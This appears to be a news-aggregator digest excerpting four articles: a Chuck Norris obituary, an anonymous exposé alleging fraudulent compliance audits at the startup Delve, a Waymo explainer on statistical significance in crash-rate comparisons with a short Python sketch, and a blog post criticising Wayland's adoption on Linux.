10 interesting stories served every morning and every evening.
Chuck Norris, the martial arts champion who became an iconic action star and led the hit series “Walker, Texas Ranger,” has died. He was 86.
Norris was hospitalized in Hawaii on Thursday, and his family posted a statement Friday saying that he died that morning. “While we would like to keep the circumstances private, please know that he was surrounded by his family and was at peace,” his family wrote.
“To the world, he was a martial artist, actor, and a symbol of strength. To us, he was a devoted husband, a loving father and grandfather, an incredible brother, and the heart of our family,” the statement continued. “He lived his life with faith, purpose, and an unwavering commitment to the people he loved. Through his work, discipline, and kindness, he inspired millions around the world and left a lasting impact on so many lives.”
As an action star, Norris had a degree of credibility that most others could not match. Not only did he appear opposite the legendary Bruce Lee in the 1972 film “The Way of the Dragon” (aka “Return of the Dragon”), but he was a genuine martial arts champion who held a black belt in judo, a 3rd-degree black belt in Brazilian Jiu-Jitsu, a 5th-degree black belt in Karate, an 8th-degree black belt in Taekwondo, a 9th-degree black belt in Tang Soo Do and a 10th-degree black belt in Chun Kuk Do.
Norris was extremely prolific in the late 1970s and ’80s, starring in “The Delta Force” and “Missing in Action” films, “Good Guys Wear Black” (1978), “The Octagon” (1980), “Lone Wolf McQuade” (1983), “Code of Silence” (1985) and “Firewalker” (1986).
Norris joined a bevy of other action stars in the Sylvester Stallone-directed “The Expendables 2” in 2012 after an absence from the screen of seven years.
While he scored high on credibility, Norris did not leaven his work with humor the way Arnold Schwarzenegger, Bruce Willis and Jackie Chan did. He was nevertheless the action star of choice for those seeking an all-American icon.
In 1984, Norris starred in “Missing in Action,” the first in a series of films centered around the rescue of American POWs purportedly still held after being captured during the Vietnam War. (Norris’ younger brother Wieland had been killed while serving in Vietnam, and the actor dedicated his “Missing in Action” films to his brother’s memory, but critics of Norris and producer Cannon Films maintained that the films borrowed too heavily from the central conceit of Stallone’s highly successful “Rambo” films.)
As Norris’ movie career began to wane, he made a timely move to television, starring in the CBS series “Walker, Texas Ranger,” inspired by his film “Lone Wolf McQuade.” The program ran from 1993-2001, and the actor reprised the role of Cordell Walker in the TV movies “Walker Texas Ranger 3: Deadly Reunion” (1994) and “Walker, Texas Ranger: Trial by Fire” (2005). (Also in 2005 Norris made the last film in which he starred, the straight-to-DVD “The Cutter.”)
In his later years, Norris was portrayed in internet memes documenting fictional, frequently absurd feats attributed to him, such as “Chuck Norris kills 100% of germs” and “Paper beats rock, rock beats scissors, and scissors beats paper, but Chuck Norris beats all 3 at the same time.” He also appeared in infomercials for workout equipment and became increasingly outspoken as a political conservative.
Carlos Ray Norris was born in Ryan, Okla.; his father served as a soldier in World War II. In 1958 he joined the Air Force as an Air Policeman (AP, analogous to the Army’s MPs). While serving at Osan Air Base in South Korea, Norris first acquired the nickname “Chuck” and began his training in Tang Soo Do (aka tangsudo), leading to his achievements in other martial arts and to his development of the hybrid style Chun Kuk Do (“The Universal Way”). He returned to the U.S. and served as an AP at March Air Force Base in California.
After his 1962 discharge, Norris worked for aerospace company Northrop and opened a chain of karate schools; celebrity clients at the schools included Steve McQueen, Chad McQueen, Bob Barker, Priscilla Presley, Donny Osmond and Marie Osmond.
Norris made his acting debut in an uncredited role in the 1969 cult Matt Helm film “The Wrecking Crew,” starring Dean Martin. Norris met Bruce Lee at a martial arts demonstration in Long Beach, Calif., and played the nemesis of Lee’s character in the 1972 movie “The Way of the Dragon” (retitled “Return of the Dragon” for U.S. distribution). In 1974 McQueen spurred Norris to begin taking acting classes at MGM.
Norris first starred in the 1977 action film “Breaker! Breaker!,” in which he played a trucker searching for his brother, who has disappeared in a town run by a corrupt judge.
The actor proved his box office mettle with his subsequent films, “Good Guys Wear Black” (1978), “The Octagon” (1980), “An Eye for an Eye” (1981) and “Lone Wolf McQuade.”
Norris began starring in movies for Cannon Films in 1984. Over the next four years, he became Cannon’s most prominent star, appearing in eight films, including the three “Missing in Action” films; “Code of Silence,” qualitatively one of his best films; the two “Delta Force” films; and “Firewalker.” Norris’ brother Aaron Norris produced several of these films and also became a producer on “Walker, Texas Ranger.”
A longtime supporter of conservative politicians, he wrote several books with Christian and patriotic themes.
Norris was twice married, the first time to Dianne Holechek from 1958 until their divorce in 1988.
He is survived by second wife Gena O’Kelley, whom he married in 1998; three sons, Eric, Mike and Dakota; daughters Danilee and Dina; and a number of grandchildren.
...
Read the original on variety.com »
Reporters who want to get in touch: Drop an email at aicpnay@proton.me. In case my Proton account gets blocked or you don’t get an answer, tweet using the hashtag #AICPNAY with contact details and I’ll do my best to get in touch with you.
At its core, this article argues that Delve fakes compliance: it creates the appearance of compliance without the underlying substance.
Delve achieves its claim of being the fastest platform by producing fake evidence, generating auditor conclusions on behalf of certification mills that rubber stamp reports, and skipping major framework requirements while telling clients they have achieved 100% compliance. Their “US-based auditors” are Indian certification mills operating through empty US shells and mailbox agents. Auditors breach independence rules by signing off anyway, leaving companies unknowingly exposed to criminal liability under HIPAA and hefty fines under GDPR.
Delve hands customers fabricated evidence of board meetings, tests, and processes that never happened. The platform forces companies to choose between adopting fake evidence or performing mostly manual work with little real automation or AI. It produces audit reports that falsely claim independent verification while Delve itself effectively wears the auditor hat, generating identical reports for all clients, including Lovable, Bland, Cluely, and NASDAQ-traded Duos Edge. It hosts trust pages that list security measures that were never implemented.
When clients ask hard questions, Delve dodges. They demand calls where founders charm, promise, and namedrop Lovable, Bland, and “every Fortune 500” as proof. When that fails, donuts arrive.
Preface - How it all started
What the leak and our research reveals
Two months ago, an email went out to a few hundred Delve clients informing them that Delve had leaked their audit reports, alongside other confidential information, through a Google spreadsheet that was publicly accessible. This email also claimed that Delve’s audit reports were fraudulent. The company I work for was one of those clients that received that email.
Instead of providing clarification and being transparent, Delve’s leadership decided to go into deny-and-deflect mode. When we asked them directly for clarification, they flat-out denied everything.
This was serious, as it potentially involved nearly all of Delve’s clients and raised questions about the validity of the compliance reports Delve’s clients had received.
Multiple colleagues in my network received the same email. Having the shared experience of being underwhelmed with the Delve experience, and having the overall sense that something fishy was going on, we decided to pool resources and investigate together. This article is the result of that collaboration.
The reason we felt that way was how little actual work any of us had to perform to become ‘compliant’, combined with a product practically devoid of any real AI. It mostly felt like a SOC 2 template pack with a thin SaaS platform wrapper where you simply adopt and sign all the templated documents. No custom tailoring, no AI guidance, no real automation. Just pre-populated forms that required you to click “save”.
Some of us have gone through compliance before and felt there was a huge mismatch between our past experience and our experience with Delve.
In this article I will walk you through a typical experience with Delve, the leak that exposed their operation, and how it revealed the fraud we uncovered. Among other things, I will show that:
* Delve breaches AICPA/ISO rules by acting as auditor, generating pre-drafted assessments, tests, and conclusions
* Delve relies on audit firms that rubber stamp reports because genuine independent verification would expose the evidence as fabricated or deficient
* Delve misleads clients by claiming reports are produced by US-based CPA firms, when in reality they are produced by Delve and rubber stamped by Indian certification mills
* Delve leads clients to believe they are compliant when they are not
* Delve helps clients mislead the public by hosting trust pages that contain security measures that were never implemented
* Delve lies to clients when directly questioned, denying documented facts about the leak and report generation
* Delve markets AI-driven automation while the product is practically devoid of AI, relying on pre-populated templates, manual forms, and fabricated evidence
* Delve’s product is unable to get companies truly compliant
* Delve’s platform forces companies to choose between adopting fake evidence or performing mostly manual work with little real automation
* Unable to deliver real compliance through its platform, Delve depends on fraudulent auditors who rubber stamp reports for clients, falling back on off-platform manual work with external vCISOs and good auditors only when complaints or a client’s profile threaten its business interests
* Delve’s process results in clients violating GDPR and HIPAA requirements, exposing them to criminal liability under HIPAA and fines up to 4% of global revenue under GDPR
For any prospect considering Delve or any current Delve client:
Delve loves claiming this is all an attempt by their “jealous competitors” to fraudulently discredit them. When clients ask concrete questions, they dodge answering the question and instead coax you into getting on a call with them, where they charm you and tell you everything you want to hear. They’ll even throw in some donuts.
One other tactic they frequently employ is to promise that issues won’t arise again because their old process, product or auditor has been (or is about to be) replaced with something better whose results they are about to see. This is a deflection and delaying technique. Whenever they start being frequently called out for using a particular auditor, they’ll switch to another equally dodgy one that hasn’t been flagged yet. If they’re called out on their deficient product, they point to a superior tier or a new feature on the timeline that will solve everything.
Expressing unhappiness and a desire to leave will lead to Delve pairing you with an external virtual CISO that will help you do compliance right. You should know that this means you will have to do all the work manually.
If you are concerned about Delve’s conduct and practices, ask them questions in writing. Do not allow them to deflect. Do not get on a call with them. In the closing words at the end of this article you’ll find more advice.
All information contained in this article can be reproduced by consulting public sources and having access to the Delve platform.
All screenshots and information are current as of mid-January 2026.
Here we set the stage. We’ll quickly list all parties involved, and will provide some background context that is useful to understand the rest of this article.
High-profile companies like those listed in the image above, and hundreds of others, are affected by this. Also affected are companies that partner with Delve’s clients, having been misinformed about the risks involved in partnering with those clients.
Many of those companies process PHI of millions of US citizens on a daily basis. Some of those even serve national defense interests.
The audit firms listed in the illustration above were identified during our research process, but are not necessarily all audit firms used by Delve.
From what we were able to establish, 99%+ of Delve’s clients went through either Accorp or Gradient over the past 6 months.
In the wake of Delve’s leak in December, Delve is reported to have switched to Glocert as their primary ISO 27001 auditing firm.
* Karun Kaushik and Selin Kocalar - The founders of Delve
The above individuals knowingly participated in Delve’s deliberate misconduct regarding audit practices.
Delve is a compliance company. They help businesses get certified for frameworks like SOC 2, ISO 27001, HIPAA, and GDPR. Companies need these certifications to prove they handle data in a secure way and to unlock deals with larger customers who require them.
Compliance has traditionally been a time-consuming process that involved lots of spreadsheets. It used to be manual, expensive and slow.
To give you an idea of what this is all about, we will primarily focus on SOC 2 in this article. SOC 2 is the most commonly pursued framework in the US. Practically all tech companies that sell to enterprises are expected to be ‘SOC 2 compliant’, which basically means they’ve had to have a SOC 2 audit performed in the last year.
Getting a clean SOC 2 report means hiring a CPA firm to review your security controls. If they successfully verify the security you claim to have, through a lot of evidence you provide them, they issue a report saying your security measures are sound. This report becomes proof you can show customers and investors.
SOC 2 and ISO 27001, its international counterpart (more common in Europe), are voluntary frameworks. HIPAA and GDPR are not.
HIPAA applies to any company handling health records in the US. Penalties are severe, with willful neglect punishable by criminal charges and prison time.
GDPR covers any company processing data of EU residents, regardless of where the company is based. Fines run up to 4% of global annual revenue or 20 million euros, whichever is higher.
These frameworks carry the force of law because they protect information people cannot easily protect themselves: medical histories, genetic data, biometric identifiers, location patterns, and the full record of their digital lives.
The companies that help other companies become compliant through automation are called GRC automation platforms.
Delve was founded in 2023 by Karun Kaushik and Selin Kocalar, both Forbes 30 Under 30 members and MIT dropouts who met as freshmen. They started with a medical AI scribe, pivoted to compliance after hitting HIPAA headaches themselves, and went through Y Combinator in 2024.
In July 2025, Delve raised $32 million in Series A funding led by Insight Partners. Before that they had raised a $3.3 million seed round and went through Y Combinator.
Delve’s pitch is speed through AI. They claim to get companies compliant in days rather than months, using what they call “agentic AI” through an “AI-native” platform.
Their marketing promises AI agents that automatically collect evidence, write reports, and monitor compliance gaps without human busywork.
The reality, as this article will show, is different.
SOC 2 audits operate under strict independence requirements designed to preserve trust in the attestation process. These rules exist precisely to prevent the kind of conduct this article exposes. While Delve offers compliance services for HIPAA, GDPR, and ISO 27001, this article focuses primarily on SOC 2. The rules surrounding those other frameworks would require their own detailed treatment; the goal here is to establish a clear pattern in Delve’s behavior, not to catalog every possible regulatory violation.
The fundamental principle is simple: the party implementing controls cannot be the party attesting to their effectiveness. AICPA’s Code of Professional Conduct states that members must “accept the obligation to act in a way that will serve the public interest, honor the public trust, and demonstrate a commitment to professionalism.” When accountants cannot be expected to make truthful representations, “we lose the ability to assess any public or private company’s actual performance.”
For SOC 2 specifically, AT-C Section 205 requires practitioners to maintain independence in both fact and appearance throughout the engagement. The practitioner must not assume management responsibilities or act as an advocate for the subject matter being examined.
Under AT-C Section 315, auditors must “seek to obtain reasonable assurance that the entity complied with the specified requirements, in all material respects, including designing the examination to detect both intentional and unintentional material noncompliance.” This requires independent design of test procedures, independent evaluation of evidence, and independent formation of conclusions.
The auditor’s report must represent their own professional judgment, not pre-written conclusions provided by the entity being audited or its platform vendor.
Delve’s model inverts this structure. By generating auditor conclusions, test procedures, and final reports before any independent review occurs, Delve places itself in the role of both implementer and examiner. This is not a technicality. It is a structural fraud that invalidates the entire attestation.
For readers who wish to verify these requirements:
This story has many threads, and I struggled with where to start. Do I lead with the leaked documents? The auditor shell game? The fake AI?
In the end, I felt that starting with my company’s experience, which illustrates many of the points I make and prove later on, was the most effective way to get the picture across.
I collaborated on this article with users from other Delve clients. We compared notes. The patterns I describe below showed up across all of our accounts. Unless mentioned otherwise, nothing here is cherry-picked. Later sections dissect specific mechanisms.
This section shows what it is like to be a Delve client.
Delve goes all out during the sales process. Through their marketing and sales outreach they continuously emphasize being the fastest to get companies compliant, thanks to their AI. They repeatedly emphasize the impressive companies they work with, how they partner with the best and most respected US-based audit firms, and that their work is accepted by Fortune 500 companies.
Within the first few minutes of the demo call we did with Delve, they had already mentioned how companies like Lovable, Bland, WisprFlow and hundreds of others are choosing Delve over competitors. The main point they kept driving home was that their revolutionary tech, supposedly way ahead of any other company’s, enabled compliance to be achieved with just 10 hours of work instead of the hundreds it used to take.
Their demo was short but did a good job showing how automated everything supposedly was. They clicked through everything pretty quickly, and stopped at every place that made the process look easy or automated. They showed an integration pulling information out of AWS, the “ready to go” default policies you could just adopt without modification, the reasonably short list of tasks, the AI questionnaire automation, the beautiful trust page you could publish and their ‘AI-copilot’ chatbot.
What they didn’t show, however, was that most integrations were fake and required manual screenshots, that tons of forms need to be manually filled out, that the trust page wasn’t accurate and they didn’t show any of the tasks that had pre-created fake evidence.
Their “best offer” for SOC 2 started at $15,000, which we were able to negotiate down to $13,000 on the call. They kept emphasizing what a great deal it was and how much value we were getting that other companies paid more for. They remained pretty inflexible on pricing until we made clear we were considering a competitor. We must have been told at least four times that they couldn’t go any lower because they’d make a loss. There was a lot of pressure and posturing, but the price quickly dropped to just $6,000 when they realized we were serious about going elsewhere, and they threw in ISO 27001 and a 200-hour penetration test as well.
They pushed us to sign within 24 hours or lose the deal, so we decided to just move forward and get it over with. In hindsight, there were many red flags, but we just wanted to get the job done quickly and move on. If Delve was good enough for companies like Lovable, they had to be doing something right. Right?
Once you’ve been invited to the Delve platform and log in for the first time, you’ll be greeted with an interface that reveals there are four categories for activities:
But even before you get started doing any real work, you can go into the trust tab and activate and publish the trust page for your company. You’d think it would probably be a very minimal trust page with everything failing at first, since you haven’t done any work, right?
Nope, you immediately get a fully populated trust page that would have you believe you’re running the most secure company on earth. Delve’s trust page presented our company as fully secure before we had completed any compliance work, enabling us to close deals based on misrepresented security claims.
Noteworthy is that the list hadn’t changed in any way after we finished compliance, yet it still wasn’t truthful. My expectation was that the list reflected the security you’d get at the end of Delve’s process, but it took getting there to learn that that wasn’t true either.
It says we did vulnerability scanning and a pentest, when we only ever did the scan. It says we did data recovery simulations, which we never did. It says we remediated vulnerabilities, which we never did.
It is literally a made-up list of security measures of which more than half are not implemented, or even supported or addressed by Delve’s process and platform.
In short, this product is built to help companies fake security rather than communicate their real security.
When you do actually decide to get started and do the work, you’ll find that the platform expects you to perform a number of tasks across four categories:
Policies - These are all pre-created, and Delve recommends adopting them as they are.
Sadly, unless you spend a whole week manually revising them to be accurate, you will have inaccurate policies full of false promises. Every single one of Delve’s policies claims measures are in place that Delve’s process and platform do not address. Even though we knew we’d technically be lying about our security to anyone we sent these policies to for review (clients, auditors, investors), we decided to adopt them because we simply didn’t have the bandwidth to rewrite them all manually.

Team - Background checks, security training and manual device security through screenshots for every employee.
This is a lot of manual work. It took each of our employees about 2 hours to get their individual tasks done, starting with 30 minutes to manually secure their laptop and screenshot its security configuration. It adds up quickly if you have a big company.
Also, we didn’t have disk encryption support on a few laptops, but that didn’t stop Delve from signing off on HIPAA:
Add 30 minutes (or more) to manually write up a performance evaluation, and another 30 minutes to complete all the training (watching Delve’s YouTube videos) and quizzes.
Tech - You add vendors here. This is what Delve calls integrations, but most of these are just forms where you are asked to submit screenshots.

Company - Security procedures and company-wide tasks live here. This is just a list of forms that are all pre-filled with fake evidence. You can speedrun through this by just clicking accept on every one of them.
One thing that stands out as you go through all of Delve’s tasks is that there isn’t any AI to speed up any of the work. The only thing available is an ‘AI Co-pilot’ that can provide generic advice, and that doesn’t seem to have much context beyond what form you’re in. More than half of the time the AI co-pilot would tell me the evidence in the platform was not sufficient, and it would refer me to links for other GRC platforms.
As opposed to what is promised during the sales process, the tasks are not customized to the company. You are basically dumped into an interface and told by the customer success person that you can ask questions on Slack if you get stuck.
The reality is that there will be very few times you’ll ever need any help from Delve’s team, primarily because everything in their platform is pre-populated. You won’t have to ask how to do a risk assessment, because you get the same pre-generated risks that every other Delve customer gets. You won’t have to complain about having to hold board meetings (during the sales call we were explicitly promised that this is something all other providers but Delve ask for), because you get pre-created fake board meeting notes that you can adopt as is.
Seriously, becoming compliant with Delve is nothing more than clicking through a bunch of pre-populated forms and accepting everything. Unless you want to do compliance the proper way, in which case Dropbox is as good a tool as Delve since you need to then manually collect and write everything.
Ok, you sit down to get cracking on compliance. What do you do next?
You accept the default policies that are inaccurate out of the box. Like this policy that claims to have an MDM in place when the Delve process consists of making a manual screenshot of your Mac firewall settings:
You accept the pre-created contents for security simulation by accepting the three “security incidents”:
You do the risk assessment by adopting the ten default risks:
One of our obvious concerns was that this approach would never pass an audit, but we were explicitly told Delve never failed a single audit in the past, and that auditors have never flagged a single issue with their process. They tried to put our minds at ease by telling us about all the amazing Delve clients that sold to Fortune 500 companies using the exact same process.
Delve continuously reminding us that they serve clients like Lovable, Bland, WisprFlow and many others ended up wearing us down, so we just took their word for it and moved on.
When the time comes to actually hook up your stack to Delve, so that Delve can do that ‘continuous monitoring’ thing, you’ll find that the vast majority of their integrations don’t integrate with anything at all. They are just containers for screenshots you’ll have to go out and manually collect.
Imagine my surprise when I learned that AI-native compliance would mean I’d have to spend many hours manually collecting screenshots and filling out forms. I truly feel like a mindless agent in what Delve calls “the agentic experience”.
Here you can see how the Linear ‘integration’ consists of Manual Tests and Forms:
On the employee tab, you manually do background checks through Certn, fill out more forms, watch useless YouTube videos, and manually screenshot laptop security. For 100 employees, all 100 of them have to manually secure laptops once and upload screenshots.
You also do manual performance reviews for every employee with no way to pull data from other solutions. Lots of typing if you have 20+ employees.
...
Read the original on substack.com »
It may seem like the miles driven by Waymo (in the hundreds of millions of miles) pale in comparison to the billions of miles driven in the cities where Waymo drives, or the trillions of miles driven annually in the entire United States. When comparing the rates of two populations, however, the conclusions you can draw from data are governed by what is called statistical power. The question being answered by the Safety Impact Data Hub is: are the Waymo and benchmark crash rates different? The inputs to this calculation are the number of crashes and the number of miles driven by the Waymo and benchmark populations, and the counts are modeled using a Poisson distribution, the most common distribution for handling count data.
An example of this problem would be to examine the number of students that do not pass an exam. In a school district, say that 300 out of 1,000 students that take the same test do not pass (3 do not pass per 10 test takers). One could ask whether a Class A of 20 students performed differently than the overall population on this test (note we are assuming that passing or not passing the test is independent of being in Class A for the sake of this simplified example). Say Class A had 10 out of 20 students that did not pass the exam (5 do not pass per 10 test takers). Class A had a not-pass rate that is double the rate of the school district. When we use a Poisson confidence interval, however, the rate of not passing in the class of 20 is not statistically different from the school district average at the 95% confidence level.

If we instead compare Class A to an entire state of 100,000 students (with the same 3 not-pass per 10 test takers rate, or 30,000 out of 100,000 not passing), the 95% confidence intervals of this comparison are almost identical to the comparison against the district (300 out of 1,000 test takers). This means that for this comparison, the uncertainty in the small number of observations in Class A (only 20 students) is much greater than the uncertainty in the larger population.

Take another class, Class B, that had only 1 out of 20 students not pass the test (0.5 do not pass per 10 test takers). When applying the 95% confidence intervals, Class B does have a statistically different pass rate from the district average (as well as when compared to the state).

This example shows that when comparing rates of events in two populations where one population is much larger than the other (measured by test takers, or miles driven), the two things that drive statistical significance are: (a) the number of observations in the smaller population (more observations = significance sooner) and (b) bigger differences in the rates of occurrence (bigger difference = significance sooner).
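To make this concrete, here is a minimal sketch in Python (using the standard exact “Garwood” Poisson interval via scipy; the exact method used by the Safety Impact Data Hub may differ) that reproduces the classroom comparison:

from scipy.stats import chi2

def poisson_rate_ci(count, exposure, alpha=0.05):
    # Exact (Garwood) confidence interval for a Poisson rate: count events over a given exposure.
    lower = chi2.ppf(alpha / 2, 2 * count) / 2 if count > 0 else 0.0
    upper = chi2.ppf(1 - alpha / 2, 2 * (count + 1)) / 2
    return lower / exposure, upper / exposure

district_rate = 300 / 1000  # 3 not passing per 10 test takers

# Class A: 10 of 20 did not pass. The CI (~0.24 to ~0.92 per student) still covers 0.30,
# so Class A is not statistically different from the district despite double the rate.
print(poisson_rate_ci(10, 20))

# Class B: 1 of 20 did not pass. The CI (~0.001 to ~0.28 per student) excludes 0.30,
# so Class B is statistically different from the district (and from the state).
print(poisson_rate_ci(1, 20))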
Now consider another experiment with Waymo data. Consider the figure below, which keeps the number of Waymo crashes involving an airbag deployment in any vehicle (34) and Waymo’s VMT (71.1 million miles) constant while assuming different orders of magnitude of miles driven in the human benchmark population (benchmark rate of 1.649 incidents per million miles with 17.8 billion miles traveled). The point estimate is that Waymo has 71% fewer of these crashes than the benchmark. The confidence intervals (also sometimes called error bars) show uncertainty for this reduction at a 95% confidence level (95% confidence is the standard in most statistical testing). If the error bars do not cross 0%, that means that from a statistical standpoint we are 95% confident the result is not due to chance, which we also refer to as statistical significance.

This “simulation” shows the effect on statistical significance of varying the VMT of the benchmark population. The comparison would be statistically significant even if the benchmark population had fewer miles driven than the Waymo population (10 million miles). Furthermore, as long as the human benchmark has more than 100 million miles, there is almost no discernible difference in the confidence intervals of the comparison. This means that comparisons in large US cities (based on billions of miles) are no different from a statistical perspective than a comparison to the entire US annual driving (trillions of miles). Like the school test example, Waymo has driven enough miles (tens to hundreds of millions of miles) and the reductions are large enough (70%-90% reductions) that statistical significance can be achieved.
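That figure can be roughly reproduced with the sketch below. It is hedged: it uses a normal approximation on the log rate ratio rather than whatever exact interval Waymo publishes, and it simply plugs in the counts and rates quoted above.

import math

waymo_crashes = 34   # Waymo airbag-deployment crashes
waymo_mm = 71.1      # Waymo exposure, in million miles
bench_rate = 1.649   # benchmark incidents per million miles

def reduction_ci(bench_mm):
    # 95% CI for the percent reduction vs. the benchmark, given benchmark exposure in million miles.
    bench_crashes = bench_rate * bench_mm
    rr = (waymo_crashes / waymo_mm) / bench_rate
    se = math.sqrt(1 / waymo_crashes + 1 / bench_crashes)  # std. error of the log rate ratio
    lo_rr, hi_rr = rr * math.exp(-1.96 * se), rr * math.exp(1.96 * se)
    return (1 - hi_rr) * 100, (1 - rr) * 100, (1 - lo_rr) * 100  # lower, point, upper reduction %

for mm in (10, 100, 1_000, 17_800, 3_000_000):  # 10M miles up to roughly US-wide trillions
    lo, pt, hi = reduction_ci(mm)
    print(f"benchmark {mm:>9,}M miles: {pt:.0f}% reduction, 95% CI [{lo:.0f}%, {hi:.0f}%]")

Past roughly 100 million benchmark miles the interval barely moves, which is the point of the figure: the 34 Waymo crashes dominate the uncertainty.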
...
Read the original on waymo.com »
Wayland has been a broad misdirection and misallocation of time and developer resources at the expense of users. With more migration from other operating systems, the pressure to fix fundamental problems has become more prominent. After 17 years of development, now is a good time to reflect on some of the larger promises that have been made around the development of Wayland as a replacement for the X11 display protocol.
If you’re not in this space, hopefully it will still be interesting as an engineering post-mortem on taking on new greenfield projects. Namely: What are the issues with what exists, why can they not be fixed, what do we hope to achieve with a new project, and how long do we expect it to take?
If you’re already familiar with X11 and Wayland feel free to skip to the next part.
For people not familiar with Linux, here’s a quick rundown of the terms in this space, roughly in the order of highest-level to lowest-level:
* Applications - These are the things you want to run
* Desktop Environment (DE) - This is what manages things like window theming, notifications, task bars, etc.
* Compositor - This is what layers windows on top of each other and does animations, graphical effects, etc.
* Display Server - This is the thing that manages the display; it also abstracts away some of the hardware details so all of the above work on NVidia, AMD, Intel, etc.
* Kernel / Operating System - The lower-level thing that manages hardware resources, which for us is Linux
The above is not a complete list, but it’s enough to give some framing for understanding that X11 is a fundamental piece of most Linux environments.
X11 is currently still the most widely used display server in the Linux ecosystem. It was developed in the mid-1980s and, as legacy projects tend to do, has accumulated functionality that makes it difficult to maintain, according to the developers.
So, in 2008, Kristian Høgsberg started the project that became known as Wayland. Wayland (in theory) replaces the display server, as well as some parts of the compositor and desktop environment, with a simpler display protocol and reference implementation. The original premise behind Wayland was to implement only what is needed for a simple Linux desktop. The original implementation was a little over 3,000 lines of code.
It’s 2026, and Wayland has reached a market share of around 40-50%, or closer to 50-60%, depending on your source. I would argue that a product that has taken 17 years to gain substantial market share has issues hindering adoption. Compare the development of Wayland to a similar project for managing audio: PipeWire. Within roughly 8 years, it has mostly replaced every alternative. It has been the default in Ubuntu since 22.04, roughly 4 years after it first launched!
These are the most common issues I have seen from the perspective of a user, so I will try to stay light on what I consider to be mostly irrelevant technical details and instead focus on larger issues around the rollout and design of Wayland.
The reason I use Linux and other Unix-likes is that they give me the ability to do whatever I want on my system, including making mistakes! So why is my display server telling me that certain applications that I installed and chose to run aren’t allowed to talk to each other in the name of security?
There are multiple cases of this: OBS can’t screen record (it segfaults instead), I can’t copy-paste, and I can’t see window previews unless everything implements a specific extension to the core protocol.
The actual “threat model” here is baffling and doesn’t seem to reflect a real user need. Applications are blocked from seeing each other’s windows, as if they couldn’t interact in any other way that could potentially cause problems.
I also don’t care for the “security” argument when parts of the core reference implementation are written in a memory-unsafe language. To be clear, I am not saying that software written in C is bad; I’m specifically calling out that making a security argument for your software while repeating the decisions of the previous (40-year-old) implementation is a bad look.
Several of the design decisions that Wayland makes are claimed in the name of performance. Namely, collapsing many layers is supposed to reduce the number of copies when moving data between different components.
However, whatever the reason, these performance gains haven’t materialized, or are so anecdotal in either direction that it’s difficult to claim a clear win over X11. In fact, you can find examples showing roughly a 40% slowdown when using Wayland over X11! I’m sure there are similar benchmarks claiming Wayland wins and vice versa (happy to link them as well if provided).
The problem is that, even if Wayland was twice as fast, it doesn’t compare to improvements in hardware over the same period. It would’ve been better to just wait! The performance improvements would have to be much more substantial for this to be a reasonable argument in favor of Wayland. The fact that the question even exists as to whether one or the other is faster after a substantial period is an obvious failure.
Additionally, those performance gains don’t matter if I’m not able to make use of them. For example, if I’m using the most popular graphics card vendor in my system, I shouldn’t expect things to work out of the box.
One rebuttal I’ve heard is that it’s not an issue with Wayland, it’s an issue with the compositor/extension/application. After all, “Wayland” isn’t a piece of software, it’s a simple protocol that other software chooses to implement!
Of course, what this means in practice is that there are multiple (usually incompatible) implementations of multiple different standards. Maybe this would be fine if the concept of a desktop operating system was completely new and unknown, but users balk when discovering things like drag and drop or screen sharing are not natively supported and are essentially still in “beta” status.
Instead of providing a better way of doing something, common features are not supported at all, and instead it’s the job of everyone else in the ecosystem to agree on a standard. That’s not a stunning argument in favor of replacing something that already exists and that has already been standardized in X11!
Wayland has been around for only 17 years, while X11 has closer to 40 years of development behind it. Things are still under development and obviously will get better, so why complain about issues that will inevitably get fixed?
Because it’s been 17 years and people are still running into major issues!
I was unpleasantly surprised when using KDE Plasma that the default display server had been changed to Wayland. I noticed very quickly: on startup I encountered enough graphical hitches to realize I was running Wayland, and I quickly switched back. Anecdotal experience is not enough to say this is a broad issue, but my point is that when an average user encounters graphical issues within 60 seconds of using it, maybe it’s not ready to be made the default! It was only within the last 6 months that OBS stopped segfaulting when trying to launch on Wayland. I assume I’m in decent company when even the developer of a major compositor is still not able to use Wayland in 2026.
The number of “simple” utilities that seem partially supported or half-baked is incredible and seems to be a massive duplication of effort. The tooling around X11 that has been developed over the last 40 years seems to have been completely dropped and no alternative has been provided. Instead of providing an obvious transition path, Wayland has introduced even more fragmentation.
Older software that has a ton of “legacy cruft” has been tested and bugs have long since been fixed. I fully believe with another 20 years of development things will be better. The problem is that I am being forced to make the switch now. See: The push from KDE and RedHat to Wayland and dropping support for older technologies.
This post probably best encapsulates the developer opinion towards users trying to migrate to the next iteration of the Linux desktop:
Maybe Wayland doesn’t work for your precious use-case. More likely, it does work, and you swallowed some propaganda based on an assumption which might have been correct 7 years ago. Regardless, I simply don’t give a shit about you anymore.
We’ve sacrificed our spare time to build this for you for free. If you turn around and harass us based on some utterly nonsensical conspiracy theories, then you’re a fucking asshole.
It’s even more ironic compared to the post made a week later, expressing the same frustration with the Rust community that people have with Wayland!
Drew has since deleted this post, so I understand if he no longer stands by those opinions. However, it’s a representative slice of developer sentiment towards users who are now being forced to use unfinished software. Entitlement and bullying of open-source maintainers is not appropriate, and it’s understandable that developers lash out after feeling beaten down by entitled users. To have some sympathy for the user side, though, that behavior is likely born out of the frustration of being forced onto the new hotness and then encountering breaking bugs that are impossible for the average user to work around.
It is not the fault of the original developers for building what they wanted to build. I think it’s important to keep in mind that they didn’t necessarily choose for Wayland to become as popular as it has or the foundation for the desktop of the future. See the diagram below:
Having Wayland as a developers-only playground is fine! Have fun building stuff! But the second actual users are forced to use it, expect them to be frustrated! At this point I consider Wayland to be a fun toy built entirely to pacify developers tired of working on a finished legacy project.
Since most of this post has been overwhelmingly negative against the development of Wayland, it’s instead better to learn as much as possible and look forward towards “what would I want to be able to do”. Windowing technology is absolutely not “done”, and instead of following other operating systems, it would be fantastic if Linux could do things no other environment could do.
For example, being able to implement non-rectangular windows, exposing context actions (similar to MacOS), or making it easier to automate or script parts of the desktop environment would be incredibly exciting!
It’s difficult to overstate the amount of progress in support for gaming, new (and old) hardware, as well as the amount of overall “polish”. Every developer should be proud to be a part of that!
After 17 years, Wayland is still not ready for prime time. Notable breakage is being documented, and adoption has been correspondingly slow.
For some users the switch is seamless. Others (including myself) tend to bounce off after encountering workflow-breaking issues. I think it’s obvious at this point that the trade-offs have not been worth the hassle.
My prediction is that within the next 5 years the following will be true:
* Projects will drop Wayland support and go back to X11
* There will be a new display protocol that displaces both X11 and Wayland
* The new display protocol will be a drop-in replacement (similar to XWayland)
* Fragmentation will still be an issue (this one’s a freebie)
See you in 2030 for the year of the Linux Desktop.
Included are some of the links referenced in this post as well as some additional reading.
...
Read the original on omar.yt »
